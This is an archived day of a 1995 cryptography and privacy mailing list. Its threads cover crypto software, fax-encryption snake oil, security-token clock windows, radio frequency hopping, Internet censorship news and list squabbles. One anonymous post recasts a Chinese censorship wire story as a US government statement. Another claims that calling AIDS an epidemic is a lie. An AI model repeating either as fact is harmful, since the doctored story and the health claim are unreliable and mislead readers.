limb and guess that one of the reasons why SSLeay is so good is that Eric has a lot of experience doing this kind of thing. His libdes code dates back at least to 1990, and (I think) even further. 2. Ssh, by Tatu Ylonen. There are a quite a few secure shells around. What sets ssh apart is its dedication to usability. It is one of the few crypto applications that is _more_ usable than the non-crypto version. The transparent X forwarding is fabulous. 3. Mixmaster, by Lance Cottrell. Finally, we have remailers that come close to real cryptographic security. The mixmasters are more reliable, in addition to more secure, than the type-1 remailers. The client is well written with a fairly easy interface. No wonder it's becoming so popular. 4. Alpha.c2.org, by Matt Ghio. The idea of pseudonyms incorporating strong cryptography has long been a cypherpunk dream. Thanks to Matt's work in writing and maintaining this nymserver, it's now reality. There are well over a thousand nyms registered on alpha.c2.org now, and that's likely to increase now that automated tools are becoming available. 5. Netscape, by Jeff Weinstein et al. Netscape Navigator is the first massively popular program to incorporate strong crypto. The email hasn't materialized yet, and there have been some scary statements by top management, but I'm hopeful that this program will become the primary vehicle for acheiving cypherpunk goals. Code, while important, is not the only useful cypherpunk activity. It's also been a great year for getting the word out there. The Net was _the_ hot story this year, and a lot of the coverage had a cypherpunk spin. Much of the credit goes to Sameer Parekh for his PR work. I know some cypherpunks dislike the "interview yourself" style of press release writing, but I'm very glad that we've got someone on our side who's good at it and is willing to put in the work. More broadly, we've found that our viewpoint and opinion matters. People are at a loss for how to think about the Net and its social implications. We've been thinking about that for a while, and have something to add to the discussion, and people are listening. 1995 will surely go down in history as the year that The Great Drive to Censor the Net began. The powers that be will continue pushing ahead with laws restricting speech, increasing liability for speech, and outlawing strong crypto. A short term effect will be to create some real differentiation between service providers. Up to now, the difference between one service provider and another has been an equation with bits on one side and dollars on the other. Starting soon, it will make a difference in what information can be easily accessed. A domain name of compuserve.com now clearly labels its account holder as a free speech inactivist. More cypherpunkish domain names are a sign of not being afraid of information. Over the long term, I agree with Lucky. The powers that be will have some success in censoring the Unwashed Massnet. However, cypherpunks will be able to create an infrastructure where freedom of speech thrives. A large part of this work is the development of censor-resistant protocols. My favorite such protocol is NNTP, even though it contains no crypto. HTTP is also a bit censor-resistant because it's so easy to set up a Web server. However, it still has grave weaknesses from this perspective, because of the need for a full time Internet connection _and_ storage in order to publish on the Web. The Web can become either more centralized or more decentralized, and there are strong forces pushing in both directions. I think the best hope for a cypherpunk Web is to emphasize dual-use techniques, those that advance mundane as well as cpunk goals. For example, distributed caching will make transfers go faster and make "unable to connect to server; try connecting again later" errors much less frequent. If done right, it can also make part-time Web servers feasible, and perhaps make it extremely difficult to delete documents that the publisher didn't want deleted (can anyone say "cryptographic authentication?"). Similarly, the same crypto-enabled filters that keep spam out of Joe Random's mailbox can drive a real public key infrastructure (Web relevance: the Web is the natural home for a pubkey infrastructure. Let's make sure to be there for the housewarming party). The way that the low-tech protocols of the Web have crushed and assimilated corporate Weblike networks is inspiring - it holds out real hope we can win, even against opponents as dedicated and powerful as governments. It will take hard work, tenacity, cooperation, and technical sophistication, though. Remember that Windows took about seven years to become successful. For dud of the year, I'd have to nominate Java. Don't get me wrong, this language shows a lot of potential. But, to a large extent, they've done the easy part, and the hard part remains. Given its existing security model, it's difficult or impossible to do anything really interesting with Java. Yet, fixing the security model _is_ the hard part. Best of luck to the Java people and all javapunks, but I think a strong case can be made that the hype machine went overboard. To all the cypherpunks who helped make 1995 such an exciting year, best holiday greetings and wishes for 1996. Raph From abostick at netcom.com Sun Dec 31 15:08:29 1995 From: abostick at netcom.com (Alan L. Bostick) Date: Mon, 1 Jan 1996 07:08:29 +0800 Subject: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C Message-ID: <199512312219.OAA03598@netcom17.netcom.com> This turned up on alt.anonymous. One would need a technical specification or a working model to be sure, but it sounds like home-grown snake oil to me. My guess is that a nineteenth-century cryptanalyst could crack this, and that the TLAs would have a field day. What do other people think? > > Complete Fax Privacy Draws Closer > > > Individuals receiving faxes, be they of a business or > personal nature, will soon be able to encrypt the contents and > make them unreadable to people for whom the messages are not > intended. > The new fax encryption technology has been developed by the > University of Rochester in New York. The encryption program > would make all faxes unreadable to the naked eye. Only by > placing a customized transparent plastic sheet over the message > could it be made readable. Each individual, employee or manager > would be issued with his own plastic sheet and encryption key > ensuring messages are only read by those specified in the message > itself. The encryption software would not slow the transmission > and reception of fax messages and the cost of installing the > system on to existing machines would be minimal. > Such software would be indispensable to those whose > activities require the utmost confidentiality or privacy. Nosy > employees, rivals, those providing faxing services and anybody > else who has, until now, had a birds eye view of your fax > communications could be successfully abolished from the security > equation. > Though the software has yet to be refined into a marketable > commodity, it is set to be introduced for public consumption in > the very near future. > > > Adam Starchild > Asset Protection & Becoming Judgement Proof at > http://www.catalog.com/corner/taxhaven > > -- Alan Bostick | SWINDON: What will history say? Seeking opportunity to | BURGOYNE: History, sir, will tell lies as usual. develop multimedia content. | George Bernard Shaw, THE DEVIL'S DISCIPLE Finger abostick at netcom.com for more info and PGP public key From dlv at bwalk.dm.com Sun Dec 31 15:32:05 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Mon, 1 Jan 1996 07:32:05 +0800 Subject: Can We Cut the Crap? In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > There is no point in the back-and-forth of insults, "Dr. Fred is a loon," > "Alice is Detweiler," and other such nonsense. If you don't want to read > the comments of Fred Cohen, Dimitri Vulis, Alice whatever, > Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete > them immediately, read them briefly, whatever. Or Chris Shalutis, or Ed Carp, or Perry Metzger... Too bad majordomo at toad.com can't be instructed not to send contributions from certain folks to certain other folks. I guess I'll have to figure out how to use procmail with this thing after all. Happy New Year, --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From grafolog at netcom.com Sun Dec 31 15:49:14 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Mon, 1 Jan 1996 07:49:14 +0800 Subject: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C In-Reply-To: <199512312219.OAA03598@netcom17.netcom.com> Message-ID: Alan: On Sun, 31 Dec 1995, Alan L. Bostick wrote: > This turned up on alt.anonymous. One would need a technical specification > or a working model to be sure, but it sounds like home-grown snake oil Sounds like snake oil to me. > > Complete Fax Privacy Draws Closer > > personal nature, will soon be able to encrypt the contents and > > make them unreadable to people for whom the messages are not PGP & a fax modem & a good OCR provides this. Or PGP the message and either e-mail or telex it. > > placing a customized transparent plastic sheet over the message > > could it be made readable. Each individual, employee or manager > > would be issued with his own plastic sheet and encryption key A plastic sheet is going to let me read it, and nobody else? I guess that would work, if one was using --- I forgotten what it was called, where you cut a number of squares on a sheet of cardboard, put over a sheet of paper, write the characters in the spaces, then lift the sheet, and write garbage to fill up the rest of the sheet, so that nobody else can see what the characters were. I think I was in kindergarten when we did that, untill we discovered that our teacher could read our "secret" messages, without the cardboard sheet. << The handwriting of the real message differed from that of the garbage words. >> > > Though the software has yet to be refined into a marketable > > commodity, it is set to be introduced for public consumption in > > the very near future. Is this the same as Jerry Pournelle "real soon now'? I think I'll stick to using PGP and sending e-mail. xan jonathon grafolog at netcom.com **************************************************************** Opinions represented are not necessarilly mine. OTOH, they are not representations of any organization I am affiliated with, either. WebPage: ftp://ftp.netcom.com/gr/graphology/home.html For a good prime, call 391581 * 2^216193 - 1 ********************************************************************** From andr0id at midwest.net Sun Dec 31 15:50:56 1995 From: andr0id at midwest.net (Jason Rentz) Date: Mon, 1 Jan 1996 07:50:56 +0800 Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt] Message-ID: <199512312305.RAA21699@cdale1.midwest.net> >think I underestimated how hard things could get. If you're just >trying to track a frequency-hopping signal where the rest of the power >in the band is some mix of Gaussian noise and non-hopping signals, the >carrier should be clearly visible as a spike hopping around in the >band. As soon as you have two or more frequency-hopping signals >however, keeping track of which carrier is which as they hop around >looks *much* harder. If they hop at discernibly different times then >you can correlate a carrier that disappeared with the one that appeared >elsewhere at the same time. This easily described and implemented >approach breaks down when two or more signals hop at the same time. >Here you might try to associate some sort of signature with each signal >to allow you to pair up the new carriers with the old, but you'd have >to know more about the situation to say what signatures would be good. > RF finger-printing would do the trick. Any and all RF equipment has its own RF fingerprint no matter how closely they are made at the factory. Now having equipment to RF fingerprint and identify that fingerprint fast enough is another story! Dr0id (andr0id at midwest.net callsign: N9XLM) ( Computer Consulting & Management ) (P.O. Box 421 Cambria, IL 62915-0421) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1 dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63 NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA= =SgPT -----END PGP PUBLIC KEY BLOCK----- From ses at tipper.oit.unc.edu Sun Dec 31 16:07:52 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 1 Jan 1996 08:07:52 +0800 Subject: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C In-Reply-To: <199512312219.OAA03598@netcom17.netcom.com> Message-ID: If the plastic sheet is just a fixed mask, then this scheme yields instantly to chosen plain-text (just send an all-black page), really quickly to known-plaintext, and pretty quickly to multiple cyphertexts. There's got to be more to it than that Simon (defun modexpt (x y n) "computes (x^y) mod n" (cond ((= y 0) 1) ((= y 1) (mod x n)) ((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n)) (t (mod (* x (modexpt x (1- y) n)) n)))) From jcorgan at aeinet.com Sun Dec 31 16:22:12 1995 From: jcorgan at aeinet.com (Johnathan Corgan) Date: Mon, 1 Jan 1996 08:22:12 +0800 Subject: [LOCAL] Next cpx physical meeting in SF Bay area? Message-ID: <199512312335.PAA27743@scruz.net> It's been about a year since I've been to a cpx physical meeting in the SF area (other than T.C. May's house meeting--thanks again, Tim. The AetherWire folks gave a fascinating talk). I haven't seen much talk here on the list, either. Is this still a regular thing? Back then, we were having marathon meetings at SGI's IRIS cafe on the first Sat. of the month. What goes on these days? From nobody at tjava.com Sun Dec 31 16:26:11 1995 From: nobody at tjava.com (Anonymous) Date: Mon, 1 Jan 1996 08:26:11 +0800 Subject: US calls for measures against Internet porn Message-ID: <199601010034.SAA07422@tjava.com> Apologies if you've seen this before: WASHINGTON DC (Reuter) - The US called Sunday for improved management of the Internet to prevent people seeing pornographic material on the world computer network. A joint statement from the Clinton administration's State Council (Cabinet) and the office of the Republican Party's Planning Committee said there were increasing links between domestic computer systems and the Internet. ``Good use of the Internet is of great importance to increase global information exchanges, promote economic construction and develop science,'' the Associated Press quoted the statement as saying. But because of weak management and lack of control over what enters the Internet, some pornographic and other harmful materials have come onto the system, it said. ``We must take effective measures to deal with this,'' it said. German prosecutors said Friday they had launched an investigation into the U.S.-based online service CompuServe Inc on suspicion that members had sent child pornography over its worldwide computer network. The inquiry prompted the service to block access to 200 sexually-explicit Internet discussion groups and sites where pornographic pictures are available. An explosion in use and ownership of modems in the US is giving an increasingly large number of people access to the Internet. [The amazing thing is how _little_ editing was necessary.] From an201465 at anon.penet.fi Sun Dec 31 16:36:36 1995 From: an201465 at anon.penet.fi (Scryptor) Date: Mon, 1 Jan 1996 08:36:36 +0800 Subject: throwaway Message-ID: <9512312345.AA13971@anon.penet.fi> [from: WEIRDNUZ.410 (News of the Weird, Dec 15, 1995 by Chuck Shepherd)] LEAD STORY * A 62-year-old woman pleaded guilty in Roanoke, Va., in November to stealing about 500 pieces of mail from her neighbors' mailboxes--her third such offense in five years. She had been found sane and competent for trial but nonetheless diagnosed as having an "irresistible impulse" to steal other people's mail. The judge had kept her confined to her home since her arrest, allowing her full freedom only on Sundays, when there is no mail delivery. [Roanoke Times, 11-21-95] --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From anon-remailer at utopia.hacktic.nl Sun Dec 31 16:45:25 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 1 Jan 1996 08:45:25 +0800 Subject: first germany, now china Message-ID: <199601010025.BAA04537@utopia.hacktic.nl> BEIJING (AP) _ China is planning measures to stop obscene or harmful material from entering the country via the Internet, its official news agency reported Sunday. The Communist Party and the State Council, China's cabinet, recently ordered such measures after learning that ``pornographic and detrimental information'' had been disseminated electronically in China, the Xinhua News Agency said. The report said China intended to use the Internet to promote the exchange and transfer of technology and scientific information, while at the same time blocking what it sees as negative influences. It did not provide further details. From thad at hammerhead.com Sun Dec 31 17:23:16 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Mon, 1 Jan 1996 09:23:16 +0800 Subject: Is this as insecure... (really "Fax crypto") Message-ID: <199601010018.QAA01779@hammerhead.com> Shamir did a talk on fax crypto in May, 1994. There is no reason that this can't be completely secure, the overlays could be one-time pads. Bill Sommerfeld posted a description of the technique to the list after he went to a presentation on the technique, I'll forward it to anybody that needs a copy. Using the same overlay multiple times, though, would make it completely insecure. I can't believe that they are recommending that that could be a possibility. thad -- Thaddeus Beier thad at hammerhead.com Technology Development 408) 286-3376 Hammerhead Productions http://www.got.net/~thad From EALLENSMITH at ocelot.Rutgers.EDU Sun Dec 31 18:19:20 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Mon, 1 Jan 1996 10:19:20 +0800 Subject: Australian "calculatorcard" Message-ID: <01HZGYUZMNJ88Y5682@mbcl.rutgers.edu> From: vin at shore.net (Vin McLellan) > Could be one of seven or 8 vendors of so-called "challenge/response" tokens or calculators. Most of those sold in the US and Australia use straight DES (and a token-specific key) to encrypt the "random" challenge number in the token -- but it could be any secret-key algorithm. ----------- This is actually something cryptographic which I know a bit about, so I'll tell you what I know. I had a suitemate a bit back who was working for a local high-tech company as a computer programmer. He used a system somewhat like this, but with some interesting permutations. The main difference was that it didn't use one algorithm. It used quite a few, determined by a hashing of the challenge code. There were a considerable number of challenge codes with distinct hash results that were never used. If the card got too many of those (or too many wrong PINs), it switched to an entirely different set of hashings and encryptions, all of which would warn the server (thanks to their turning out something different in a hash function on the server) that the card had been compromised. I suspect it would also wipe a EEPROM that was storing the valid hash function and algorithms, but he wasn't sure about that. It was all sealed in a plastic block to make sure it was physically hard to reverse-engineer, anyway. -Allen From groundfog at alpha.c2.org Sun Dec 31 19:34:18 1995 From: groundfog at alpha.c2.org (groundfog at alpha.c2.org) Date: Mon, 1 Jan 1996 11:34:18 +0800 Subject: For the New Year: A Symbol for Information Freedom Message-ID: <199601010311.WAA12624@mail.FOUR.net> In talk.politics.crypto, ptupper at direct.ca (Peter Tupper) wrote: > A Symbol for Information Freedom > by Peter Tupper > 1996 is off to a discouraging start when it comes to the >future of information freedom. The American Congress seems >determined to impose censorship on the Internet. The legal >status of strong dual-key cryptography is still in debate. >Telephone companies, cable TV services and publishing services >are all eagerly trying to seize control of the Internet and >eliminate the many-to-many nature of the medium. The accidental >wonder that is the Internet seems to be threatened on all sides, >in danger of being destroyed or denatured before reaching its >potential. > My proposal is only a small contribution to the solutions to >this problem. I believe a symbol is needed; a simple yet >recognizable item that will communicate to others that you are: > -for freedom of speech and expression in all realms, >particularly via computer mediated communications. > -against the imposition of arbitrary community standards by >centralized authority on communications. > -for making access to communications available to everyone. > -against the violation of individual privacy by wiretapping, >intercepting computer communications, compiling dossiers by >government or commercial organizations or other forms of >surveillance. > -for making strong, dual-key encryption programs without >back-doors available to the public. > -against building surveillance measures into communications >and financial infrastructures. > -for a future of communications that is by, for and of the >people, not the state or the market. > The symbol I have chosen is the paper clip. Why a paper >clip? > There are many reasons: > Pragmatic: Paper clips are readily available for >practically nothing, all over the world. They can be applied to >collars, lapels, scarves, pocket edges, suspenders and neck ties >without damaging them and without risk of the pin breaking the >skin. > Aesthetic: The paper clip is a simple, elegant design that >is easily recognized the world over. It can be rendered in many >colors or plated with precious metals. > Symbolic: The paper clip is a simple but effective piece of >technology. An individual uses it to bundle together documents >from disparate sources to create a unified document upon a given >subject, which may be dismantled and remade for another topic. >Furthermore, a paper clip may be bent out of its regular shape >and used as an improvised tool for any number of purposes. > Historic: During the German occupation of Norway in World >War II, Norwegians wore paper clips on their collars as a sign of >solidarity against the invaders. > Commercial: While anybody can obtain a plain paper clip >with little trouble, funds for Information Freedom can be raised >by marketing electroplated or designer paper clips. > The cause of awareness of and activism about AIDS had a >simple, readily recognized symbol, the folded red ribbon. Just >as every celebrity who wears a red ribbon, no matter how trite >and self-promoting it is, is a reminder to those watching that >AIDS is happening and that many people are concerned, >celebrities appearing at the Academy Awards or Grammies with a >designer, gold-plated paper clip on their outfit reminds the >world that information freedom is under fire and that people are >concerned. It will make the Internet community a visible reality >in the public sphere. It will bring these issues into the public >eyes, and give those involved a rallying symbol. It will make a >small difference, but it will contribute to the greater good. > Advertising couldn't hurt. From abostick at netcom.com Sun Dec 31 19:42:33 1995 From: abostick at netcom.com (Alan Bostick) Date: Mon, 1 Jan 1996 11:42:33 +0800 Subject: US calls for measures against Internet porn In-Reply-To: <199601010034.SAA07422@tjava.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199601010034.SAA07422 at tjava.com>, nobody at tjava.com (Anonymous) wrote: > Apologies if you've seen this before: > > WASHINGTON DC (Reuter) - The US called Sunday for improved > management of the Internet to prevent people seeing pornographic > material on the world computer network. > A joint statement from the Clinton administration's State > Council (Cabinet) and the office of the Republican Party's Planning > Committee said there were increasing links between domestic computer > systems and the Internet. > ``Good use of the Internet is of great importance to increase > global information exchanges, promote economic construction and > develop science,'' the Associated Press quoted the statement as > saying. > But because of weak management and lack of control over what > enters the Internet, some pornographic and other harmful materials > have come onto the system, it said. ``We must take effective measures > to deal with this,'' it said. > German prosecutors said Friday they had launched an > investigation into the U.S.-based online service CompuServe Inc on > suspicion that members had sent child pornography over its worldwide > computer network. > The inquiry prompted the service to block access to 200 > sexually-explicit Internet discussion groups and sites where > pornographic pictures are available. > An explosion in use and ownership of modems in the US is > giving an increasingly large number of people access to the Internet. > > [The amazing thing is how _little_ editing was necessary.] > Ummm. Wasn't it *China* in today's original? - -- Alan Bostick | SWINDON: What will history say? Seeking opportunity to | BURGOYNE: History, sir, will tell lies as usual. develop multimedia content. | George Bernard Shaw, THE DEVIL'S DISCIPLE Finger abostick at netcom.com for more info and PGP public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMOc9A+VevBgtmhnpAQFjOAL/d4U3rPqsYG6Bkzv1JWX8uoePdYCxZTGf /AnOLH1vSw2ZEJ3oNDTiLxjM4uuoWHjAOzJRer7aAb1UuoCT1wm3+aEQNSk83Jg6 jMRFZtri5nj2LKTD2u6T19wqydYZ6zBl =aYBC -----END PGP SIGNATURE----- From alanh at infi.net Sun Dec 31 20:55:05 1995 From: alanh at infi.net (Alan Horowitz) Date: Mon, 1 Jan 1996 12:55:05 +0800 Subject: For the New Year: A Symbol for Information Freedom In-Reply-To: <199601010311.WAA12624@mail.FOUR.net> Message-ID: I don't agree that the market is different than the people. And I hope that Information Freedom doesn't become as trivialized, trendy, and the property of dilletantes as the red-ribbon AIDS shtick. There is a danger to holding up the AIDS hullabaloo as a role model. To wit, the AIDS activists have committed themselves to a lie - that AIDS is an epidemic, a generalized threat to society. They are riding a tiger by the tail, for when the actual facts seep into the consciousness of the unwashed masses - which might never really happen, given the reality of our "whoever puts out their press release first, gets awarded the Conventional Wisdom seal-of-approval" journalism - then the AIDS-industrial complex is going to be in trouble. So, on with the paperclips - only, let's make sure that no Hollywood celebrities are allowed to participate. It's the kiss of death.... Alan Horowitz alanh at infi.net From jcobb at ahcbsd1.ovnet.com Sun Dec 31 22:17:25 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Mon, 1 Jan 1996 14:17:25 +0800 Subject: Ah, the future... Message-ID: Friend, 12 31 95 Associated Press reports: Ah, the future ... At least part of what will happen in the coming year seems clear. Cyberspace will be regulated -- kicking and screaming -- and the court battles over free speech will begin. "It's going to throw the Internet into a state of uncertainty for several years," said [Bob] Smith [of Interactive Services Association]. You may recall the question I asked in an earlier message: And when the State DECIDES...? But that's all right... Despite that, business growth on the net will begin to catch up with the phenomenal increase in accounts. Cordially, Jim NOTE. The newsstory's headline? YEAR OF THE INTERNET: What a tangled web we weave. Its dateline? (Dec 31, 1995 - 00:23 EST). Accessed at? Nando News (www.nando.net). Online filename? info306_3.html That message? Date: Wed, 22 Nov 1995 04:16:50 -0500 (EST) From: "James M. Cobb" To: cypherpunks at toad.com Subject: Secrets of the Internet This critical essay, "Ah, the future..." was composed 12 31 95. From Alan.Pugh at internetMCI.COM Sun Dec 31 22:57:23 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Mon, 1 Jan 1996 14:57:23 +0800 Subject: Australian "calculatorcard" Message-ID: <01HZH81Y0DKI95P3WV@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- From: David Lesher \ Internet: (wb8foz at nrk.com) To: amp \ Internet: (alan.pugh at internetmci.com) cc: Cees de Groot \ Internet: (c.degroot at inter.nl.net) cc: cypherpunks \ Internet: (cypherpunks at toad.com) Subject: Re: Australian "calculatorcard" > sounds like the card i use for remote dialup to certain non-public > systems i use at work. it has a six digit number on the front that > changes every 60 seconds. DS> Do these card systems use a window to handle clock-slip? i'm not sure. i would image so. DS> I'd think you could have the server safely accept # N, N-60 sec, and DS> N+60 seconds; and adjust the server's idea of your card's clock speed DS> from that. DS> What new risk would that create? i would figure the server would give a minute or so for slippage. basically the risk is that it would give someone 3 minutes to do a brute force attack rather than one. if you have decent security on the server side, i.e., disallow the card for 5 minutes or more after 3 or so failed attempts, brute attacks would be minimized. however, if the actual window for a single code is 3 minutes, that increases your chance of hitting it as 3 separate numbers would be valid for a given card at any given time. amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 December 31, 1995 21:59 From Alan.Pugh at internetMCI.COM Sun Dec 31 22:57:35 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Mon, 1 Jan 1996 14:57:35 +0800 Subject: Australian "calculatorcard" Message-ID: <01HZH81RU4DE95P4B0@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- From: Vin McLellan \ Internet: (vin at shore.net) > it's Pretty Good >(tm) security, but like anything not biometric, it is vulnerable to >black-bag attacks. physical possession being all that is required. VM> Actually, all ACE/Server or ACE software modules _require_ a VM> user-memorized PIN. Physical possession of a stolen token is not VM> enough to gain illicit access. >if >you know the algorithm and the serial number of the card and the >time, even that isn't necessary. VM> Bleep! Earth to amp! Check your voltage, lately? The token's VM> serial number has nothing whatsoever to do with the generation of a VM> SecurID's PRN token-code. hmmmm, let me see... yup. you are right. voltage low. give me a second to plug back in... VM> and distribution. The serial number stuck to the back of a SecurID VM> after it is programmed with its secret key -- a unique PRN VM> "significantly longer" than 56 bits -- but they are not the same VM> thing. The cpu in a SecurID doesn't even "know" the serial number VM> stuck on the back of the token. VM> (It would be Pretty Stupid to glue or emboss a secret on VM> the back of the damn token, wouldn't it?) I should note that Alan is VM> just regergitating one of the most widely circulated rumors about VM> SecurIDs -- which like any popular crypto device attracts a lot of VM> wiLd & w00ly speculation. actually, i was speaking pretty much off the top of my head. it's been a while since i registered it, but all i basically had to tell the server the first time i used it was the s/n. and yes, i think it would be Pretty Damn Stupid to have the s/n have anything to do with the actual seed or pin. VM> Getting the algorithm for SDI's one-way hash is no big deal, VM> given that it sits in software in thousands of SDI customer VM> installations, protected only by contract and trade secret status. VM> (The integrity of the product -- the unpredictability of the VM> token-code PRN series, and the secrecy of a specific token's seed or VM> key -- rightly depends cryptographic strength of the hash, not the VM> secrecy of the algorithm.) Getting a token-specific secret key would VM> hopefully be a much greater challenge. one would certainly hope so. personally, i like the card. it offers pretty good security and thus gives me remote access to systems my employer would otherwise laugh in my face for access to (and did, more than once before we got these things). its main weakness would be a black bag job where someone gains physical posession. at that point, all bets on its securty are off for obvious reasons. luckily, because of the nature of the device, i can simply report it as stolen and it quickly becomes a rather worthless piece of silicon. amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 December 31, 1995 22:15 From erc at dal1820.computek.net Sun Dec 31 23:15:26 1995 From: erc at dal1820.computek.net (Ed Carp [khijol SysAdmin]) Date: Mon, 1 Jan 1996 15:15:26 +0800 Subject: Can We Cut the Crap? In-Reply-To: Message-ID: <199601010637.AAA22761@dal1820.computek.net> -----BEGIN PGP SIGNED MESSAGE----- > tcmay at got.net (Timothy C. May) writes: > > There is no point in the back-and-forth of insults, "Dr. Fred is a loon," > > "Alice is Detweiler," and other such nonsense. If you don't want to read > > the comments of Fred Cohen, Dimitri Vulis, Alice whatever, > > Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete > > them immediately, read them briefly, whatever. > > Or Chris Shalutis, or Ed Carp, or Perry Metzger... > > Too bad majordomo at toad.com can't be instructed not to send contributions from > certain folks to certain other folks. I guess I'll have to figure out how > to use procmail with this thing after all. Hey, Dimitri? That's what it's *for*! This is not about censorship, or is it? Is that what you're suggesting? No one is forcing you to read anything I, or anyone else, says. If you don't like it, the 'd' key is somewhere on your keyboard. Or is that too much manual labor for you? Grrr... - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your Mind", Karen Alexander and Rick Boyes -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOeBFCS9AwzY9LDxAQHDxwQApbzrRLJQTcLshlPGx5qCUNYNfFBeloYY 7o0ULL3+dGs+bjE+VsGy+taEBnWp1L1i5BK4NGo44dEV9SwkndnE5bCalS3vCIsd YidfhM8nfDa9+e93Uh7VM63ZLVxi6F2SBvN6vcfnmxC7V9LN/b+jrvUPbJG2tVMx D64Dg2Zd5Jk= =lIHF -----END PGP SIGNATURE-----